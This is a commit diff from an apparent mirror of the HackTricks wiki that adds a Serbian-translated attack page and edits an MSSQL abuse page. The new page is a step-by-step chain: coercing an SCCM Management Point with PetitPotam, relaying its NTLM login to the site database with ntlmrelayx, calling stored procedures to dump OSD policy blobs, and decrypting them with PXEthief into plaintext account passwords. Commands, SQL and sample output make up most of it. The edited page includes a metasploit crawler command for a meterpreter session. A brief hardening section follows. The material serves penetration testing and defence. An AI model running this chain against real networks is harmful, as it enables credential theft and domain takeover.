maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/active-directory-methodology/abusing-

Browse Source
This commit is contained in:
Translator 2025-07-22 08:30:50 +00:00
parent 3613b638ad
commit cfb2a31c44
3 changed files with 167 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -283,6 +283,7 @@
- [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
- [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
- [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
- [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
- [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
- [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
- [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)

16
src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View File

@ -7,7 +7,7 @@
### Python
Alat [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) se zasniva na impacket-u, i takođe omogućava autentifikaciju koristeći kerberos karte, i napad kroz lanac veza.
Alat [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) se zasniva na impacket-u, i takođe omogućava autentifikaciju koristeći kerberos karte, i napad kroz lanac linkova.
<figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
```shell
@ -90,7 +90,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
---
### Powershell
Modul powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) je veoma koristan u ovom slučaju.
Powershell modul [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) je veoma koristan u ovom slučaju.
```bash
Import-Module .\PowerupSQL.psd1
````
@ -180,7 +180,7 @@ Ako je MSSQL instanca pouzdana (povezana baza) od strane druge MSSQL instance. A
**Povezane baze funkcionišu čak i preko šuma poverenja.**
### Zloupotreba Powershell-a
### Powershell Zloupotreba
```bash
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@ -226,11 +226,11 @@ Možete lako proveriti pouzdane linkove koristeći metasploit.
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
Obratite pažnju da će metasploit pokušati da iskoristi samo `openquery()` funkciju u MSSQL (dakle, ako ne možete da izvršite komandu sa `openquery()`, moraćete da pokušate `EXECUTE` metodu **ručno** da izvršite komande, više informacija u nastavku.)
Obratite pažnju da će metasploit pokušati da zloupotrebi samo `openquery()` funkciju u MSSQL (dakle, ako ne možete da izvršite komandu sa `openquery()`, moraćete da pokušate `EXECUTE` metodu **ručno** da izvršite komande, više informacija u nastavku.)
### Ručno - Openquery()
Sa **Linux**-a možete dobiti MSSQL konzolnu ljusku sa **sqsh** i **mssqlclient.py.**
Sa **Linux**-a možete dobiti MSSQL konzolu sa **sqsh** i **mssqlclient.py.**
Sa **Windows**-a takođe možete pronaći linkove i izvršiti komande ručno koristeći **MSSQL klijent kao** [**HeidiSQL**](https://www.heidisql.com)
@ -282,4 +282,10 @@ Strategija koju su mnogi autori smislili je da primoraju SYSTEM servis da se aut
[SweetPotato](https://github.com/CCob/SweetPotato) ima kolekciju ovih raznih tehnika koje se mogu izvršiti putem Beacon-ove `execute-assembly` komande.
### SCCM Tačka Upravljanja NTLM Preusmeravanje (Ekstrakcija OSD Tajni)
Pogledajte kako se podrazumevane SQL uloge SCCM **Tačaka Upravljanja** mogu zloupotrebiti za dumpovanje tajni Mrežnog Pristupnog Naloga i Task-Sequence direktno iz baze podataka sajta:
{{#ref}}
sccm-management-point-relay-sql-policy-secrets.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

155
src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md Normal file
View File

@ -0,0 +1,155 @@
# SCCM Management Point NTLM Relay to SQL OSD Policy Secret Extraction
{{#include ../../banners/hacktricks-training.md}}
## TL;DR
Prisiljavanjem **System Center Configuration Manager (SCCM) Management Point (MP)** da se autentifikuje preko SMB/RPC i **preusmeravanjem** tog NTLM korisničkog naloga na **bazu podataka sajta (MSSQL)** dobijate `smsdbrole_MP` / `smsdbrole_MPUserSvc` prava. Ove uloge vam omogućavaju da pozivate skup procedura koje izlažu **Operating System Deployment (OSD)** policy blobove (akreditivi za pristup mreži, varijable radnog toka, itd.). Blobovi su heksadecimalno kodirani/šifrovani, ali se mogu dekodirati i dešifrovati pomoću **PXEthief**, što daje tajne u običnom tekstu.
Visok nivo lanca:
1. Otkrijte MP & bazu podataka sajta ↦ neautentifikovani HTTP endpoint `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`.
2. Pokrenite `ntlmrelayx.py -t mssql://<SiteDB> -ts -socks`.
3. Prisilite MP koristeći **PetitPotam**, PrinterBug, DFSCoerce, itd.
4. Kroz SOCKS proxy povežite se sa `mssqlclient.py -windows-auth` kao preusmereni **<DOMAIN>\\<MP-host>$** nalog.
5. Izvršite:
* `use CM_<SiteCode>`
* `exec MP_GetMachinePolicyAssignments N'<UnknownComputerGUID>',N''`
* `exec MP_GetPolicyBody N'<PolicyID>',N'<Version>'` (ili `MP_GetPolicyBodyAfterAuthorization`)
6. Uklonite `0xFFFE` BOM, `xxd -r -p` → XML → `python3 pxethief.py 7 <hex>`.
Tajne kao što su `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password`, itd. se obnavljaju bez dodirivanja PXE ili klijenata.
---
## 1. Enumerating unauthenticated MP endpoints
MP ISAPI ekstenzija **GetAuth.dll** izlaže nekoliko parametara koji ne zahtevaju autentifikaciju (osim ako je sajt samo PKI):
| Parameter | Purpose |
|-----------|---------|
| `MPKEYINFORMATIONMEDIA` | Vraća javni ključ sertifikata za potpisivanje sajta + GUID-ove *x86* / *x64* **All Unknown Computers** uređaja. |
| `MPLIST` | Lista svaki Management-Point u sajtu. |
| `SITESIGNCERT` | Vraća sertifikat za potpisivanje Primarnog Sajta (identifikuje server sajta bez LDAP). |
Zgrabite GUID-ove koji će delovati kao **clientID** za kasnije DB upite:
```bash
curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
```
---
## 2. Prosledi MP račun mašine ka MSSQL
```bash
# 1. Start the relay listener (SMB→TDS)
ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support
# 2. Trigger authentication from the MP (PetitPotam example)
python3 PetitPotam.py 10.10.10.20 10.10.10.99 \
-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10
```
Kada se primorač aktivira, trebali biste videti nešto poput:
```
[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED
[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433)
```
---
## 3. Identifikujte OSD politike putem sačuvanih procedura
Povežite se preko SOCKS proksija (port 1080 po defaultu):
```bash
proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth
```
Pređite na **CM_<SiteCode>** DB (koristite 3-cifreni kod lokacije, npr. `CM_001`).
### 3.1 Pronađite GUID-ove nepoznatih računara (opciono)
```sql
USE CM_001;
SELECT SMS_Unique_Identifier0
FROM dbo.UnknownSystem_DISC
WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86
```
### 3.2 Lista dodeljenih politika
```sql
EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N'';
```
Svaki red sadrži `PolicyAssignmentID`, `Body` (hex), `PolicyID`, `PolicyVersion`.
Fokusirajte se na politike:
* **NAAConfig** kredencijali za nalog za pristup mreži
* **TS_Sequence** varijable sekvence zadatka (OSDJoinAccount/Password)
* **CollectionSettings** može sadržati naloge za izvršavanje
### 3.3 Preuzmite puni sadržaj
Ako već imate `PolicyID` i `PolicyVersion`, možete preskočiti zahtev za clientID koristeći:
```sql
EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00';
```
> VAŽNO: U SSMS povećajte “Maksimalni broj preuzetih karaktera” (>65535) ili će blob biti skraćen.
---
## 4. Dekodirajte i dekriptujte blob
```bash
# Remove the UTF-16 BOM, convert from hex → XML
echo 'fffe3c003f0078…' | xxd -r -p > policy.xml
# Decrypt with PXEthief (7 = decrypt attribute value)
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
```
Primer oporavljenih tajni:
```
OSDJoinAccount : CONTOSO\\joiner
OSDJoinPassword: SuperSecret2025!
NetworkAccessUsername: CONTOSO\\SCCM_NAA
NetworkAccessPassword: P4ssw0rd123
```
---
## 5. Relevant SQL uloge i procedure
Upon relay, prijava je mapirana na:
* `smsdbrole_MP`
* `smsdbrole_MPUserSvc`
Ove uloge izlažu desetine EXEC dozvola, ključne koje se koriste u ovom napadu su:
| Stored Procedure | Svrha |
|------------------|---------|
| `MP_GetMachinePolicyAssignments` | Lista politika primenjenih na `clientID`. |
| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Vraća kompletno telo politike. |
| `MP_GetListOfMPsInSiteOSD` | Vraćeno putem `MPKEYINFORMATIONMEDIA` puta. |
Možete pregledati celu listu sa:
```sql
SELECT pr.name
FROM sys.database_principals AS dp
JOIN sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id
JOIN sys.objects AS pr ON pr.object_id = pe.major_id
WHERE dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc')
AND pe.permission_name='EXECUTE';
```
---
## 6. Detekcija i Ojačavanje
1. **Pratite MP prijave** bilo koji MP račun računara koji se prijavljuje sa IP adrese koja nije njegova domaćin ≈ relj.
2. Omogućite **Proširenu zaštitu za autentifikaciju (EPA)** na bazi podataka sajta (`PREVENT-14`).
3. Onemogućite neiskorišćeni NTLM, primenite SMB potpisivanje, ograničite RPC (
iste mere zaštite korišćene protiv `PetitPotam`/`PrinterBug`).
4. Ojačajte MP ↔ DB komunikaciju sa IPSec / mutual-TLS.
---
## Takođe pogledajte
* Osnovi NTLM relja:
{{#ref}}
../ntlm/README.md
{{#endref}}
* MSSQL zloupotreba i post-ekspolatacija:
{{#ref}}
abusing-ad-mssql.md
{{#endref}}
## Reference
- [Želeo bih da razgovaram sa vašim menadžerom: Krađa tajni pomoću relja tačaka upravljanja](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/)
- [PXEthief](https://github.com/MWR-CyberSec/PXEThief)
- [Menadžer pogrešnih konfiguracija ELEVATE-4 & ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager)
{{#include ../../banners/hacktricks-training.md}}